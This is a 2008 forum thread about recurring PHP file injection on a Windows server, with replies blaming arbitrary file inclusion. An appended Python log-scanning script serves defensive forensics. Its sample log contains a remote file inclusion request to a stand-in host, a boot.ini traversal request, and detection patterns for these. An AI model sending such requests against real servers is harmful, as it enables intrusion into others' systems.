potpot All American 641 Posts
OK, I'm not talking about SQL injection, I'm talking about actual file injection. For example, at the end of your PHP files you find some include to a JavaScript file on some other server. You erase the crazy code and then an hour later it comes back.
Someone or something is actually accessing the machine and changing files and permissions. Windows Small Business Server 2003. If you can cure it we can pay you.
AIM: mfetimine
11/15/2008 8:39:08 AM
qntmfred retired 40726 Posts
I think Google has some tools to find holes where malware injects itself. Look at Matt Cutts' blog, he's talked about it before. Feel free to PM me, I'm at a conference all day today but I'll get back to you.
[Edited on November 15, 2008 at 10:41 AM. Reason : .]
11/15/2008 10:41:01 AM
Noen All American 31346 Posts
You just need to trace through your IIS access logs, you will find the injection point that way with just a little text searching.
Likely they exploited a vulnerable website, and injected a dashboard, then used that to start doing file and permissions attacks.
11/16/2008 7:09:51 AM
smoothcrim Universal Magnetic! 18966 Posts
Arbitrary file inclusion, sir. You aren't sanitizing an input somewhere and/or you probably could use some locking down of your php.ini.
[Edited on November 17, 2008 at 2:53 AM. Reason : they used an arbitrary file inclusion to upload code to create the symptoms you posted like ^ said]
11/17/2008 2:52:26 AM
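
Added example, not part of any post in this thread: one way to do the text search over IIS access logs that Noen describes, flagging the file inclusion patterns smoothcrim mentions (a parameter whose value is a URL or a directory climb) plus PHP scripts requested from static directories. The log lines, the directory list and the function names are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample in IIS W3C extended format (not taken from the thread).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2008-11-14 03:10:01 198.51.100.7 GET /index.php page=about 200
2008-11-14 03:12:44 203.0.113.9 GET /index.php page=http://files.example/r.txt%3F 200
2008-11-14 03:13:02 203.0.113.9 POST /images/up.php - 200
2008-11-14 03:15:30 198.51.100.7 POST /contact.php - 200
2008-11-14 03:16:12 203.0.113.9 GET /view.php file=..%2F..%2Fboot.ini 404
"""

# A parameter value that is itself a URL, or that climbs directories,
# is the usual sign of a file inclusion attempt.
INCLUSION = re.compile(r"=(?:https?|ftp)://|\.\./|\.\.\\", re.I)
# Hypothetical policy: scripts should never run from upload/static directories.
NO_SCRIPT_DIRS = ("/images/", "/uploads/")

def parse(text):
    """Yield one dict per request, keyed by the latest #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            parts = line.split()
            if len(parts) == len(fields):  # skip truncated lines
                yield dict(zip(fields, parts))

def suspicious(text):
    """Return (reason, entry) pairs that deserve a manual look."""
    hits = []
    for e in parse(text):
        query = unquote(e.get("cs-uri-query", "-"))  # decode %2F and similar
        stem = e.get("cs-uri-stem", "").lower()
        if INCLUSION.search(query):
            hits.append(("inclusion-pattern", e))
        elif stem.endswith(".php") and stem.startswith(NO_SCRIPT_DIRS):
            hits.append(("script-in-static-dir", e))
    return hits

if __name__ == "__main__":
    for reason, e in suspicious(SAMPLE_LOG):
        print(reason, e["date"], e["time"], e["c-ip"], e["cs-uri-stem"], e["cs-uri-query"])
```

The earliest hit by timestamp is the candidate injection point; later requests from the same client address show what was done through it.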